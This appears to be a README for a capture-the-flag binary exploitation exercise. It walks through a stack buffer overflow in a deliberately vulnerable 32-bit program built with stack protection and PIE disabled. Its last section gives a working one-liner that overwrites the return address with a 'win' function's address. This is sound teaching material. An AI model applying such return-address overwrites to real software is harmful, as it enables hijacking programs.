Jack the ROPper (Jack - @omnifocal1)
- Binary has a function that never gets called (which prints flag)
- Reverse and see:
- Input with bad bounds checking
- Address of a function that will perform a desired action (printing the flag)
- Overflow saved return address with address of flag-printing function
- Win!
- On kali-rolling
apt install libc6-dev-i386
gcc -m32 -fno-stack-protector -fno-PIC -no-pie -o jtr jtr.c
- Read the SecTalks slides:
jtr.key
- Read the challenge walkthrough:
- Detailed:
jtr_walkthrough.md
- Short:
jtr_walkthrough_short.md
- Note that if using radare2 you should install from git:
- Or do it the quick way:
- Find the starting address of the win function
objdump -t jtr | grep win
- Copy the address in the first column and reverse byte order e.g.:
0804849b g F .text 00000019 win
- Becomes:
9b840408
- Build command line to overflow buffer and blast the win address all over the stack :P
python -c 'print("\x9b\x84\x04\x08" * 100)'
- Run it!:
python -c 'print("\x9b\x84\x04\x08" * 100)' | ./jtr
About
Materials, notes, and talks about binary exploitation & RE
Languages
Language:C 100.0%